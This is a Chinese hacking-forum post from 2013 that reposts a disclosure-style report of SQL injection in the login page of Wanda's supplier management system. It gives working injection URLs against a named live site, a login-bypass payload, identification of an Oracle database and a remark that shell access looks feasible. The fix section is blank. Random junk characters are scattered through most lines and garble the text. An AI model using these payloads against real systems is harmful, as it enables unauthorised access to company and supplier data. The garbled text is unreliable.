找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2433|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。
4 X+ [, i4 a$ t1 \; ]详细说明:
  [/ J# q0 G) w4 G" Q万达scm系统登陆框sql注入。
+ b0 G* z  w6 p$ i# L" f0 f* X/ |3 W) ?( E2 H, L' S$ V
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27: N8 O) T# S" x. X' {. k0 V( C, v

  |! }$ f+ j2 }  L6 X2 s2 e/ `5 _# i: m# u) p: z! D) y
500错误。- F0 \5 O6 c7 A) M* c7 C3 F
+ {, V8 U5 p  L2 A
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。3 k, ?* G9 U+ n# k% z
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png3 ]! O2 y! `3 s
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)& o) y0 J2 b# a$ z: }+ i
经过分析,登陆验证的过程应该是:1 Q# v8 d& k( U" A

* B& ?5 l+ H4 s: I- O取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。# i4 S( P  }- q+ H, U( c% D6 I
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png. E' j; d3 L' f+ q! A2 u( q8 ^8 F

6 Q/ t$ O  H( H$ N/ a7 Boracle数据库,存在注入点。@大连万达,你怎么看?% ]) k( a+ d. C# j1 u7 k( ]
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png9 p# Z- }6 Q, C& O) j9 {4 z: S: P

- {& i( T. R! ^3 e系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。7 p4 K& V' _. T4 g9 q+ r3 \
漏洞证明:
# ~( f4 U! Y* T. U# p万达scm系统登陆框sql注入。
. ]  x- {* ^, `8 h) J, y8 t. S) V+ J! k. j
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
0 t9 `0 c% k8 Z$ r) e  p- ^7 C' E, f/ m& D; s
! E; A+ [( g+ j7 `
500错误。
0 `: P1 V' {6 \. W5 z& q# X% t$ w+ [! @+ `. [7 P9 \
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。; k& ^! E% \+ f5 K- |
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
* B) f: i9 I8 Z6 D1 I1 u2 h$ U9 M6 K
# S0 S) ^8 w. q! S/ {1 T
. F6 |, h& F5 Y. n6 x. p3 r(截图有一点问题)
6 L* [7 A  I, j# R/ g' T# K, I" q4 T7 o/ m
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:) U5 s$ q& R$ }
: D' G2 U9 i6 L0 C
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。3 L3 k9 ]! K3 l- n0 Q& O

" V+ h: ~7 ~  Y绕过:
8 n1 s4 T/ e/ uhttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
+ P2 {+ j0 k5 `1 g$ V0 @" _  E  Z
: o7 }1 S' D8 M, r
. S$ |# J1 u& \( @* U* t! aoracle数据库,存在注入点。@大连万达,你怎么看?
, R$ \3 z$ ]7 J. [0 A7 K6 `; t​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
! z& v2 Q! t1 t( b* i& R% d
- M" O0 y  e/ D1 m- G修复方案:
1 ~. W4 m/ d' S8 B# I。。。% u- ^- Y* ?0 X/ t8 H' p! u
4 Q# X. C* b& }, _  U' A

. ?0 g* V* q  z) N2 D厂商已经确认; ]" F$ ^4 Y( K
) x# b/ e3 \5 ?) a0 u: c
[/td][/tr]
( p  b2 ^" p0 Q5 M[/table]* n% w- r5 N# z- W: ^5 v
- b) i' ^1 x- Q0 S4 J8 t. R8 Z0 m
% w& y% \7 w" f% \% p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表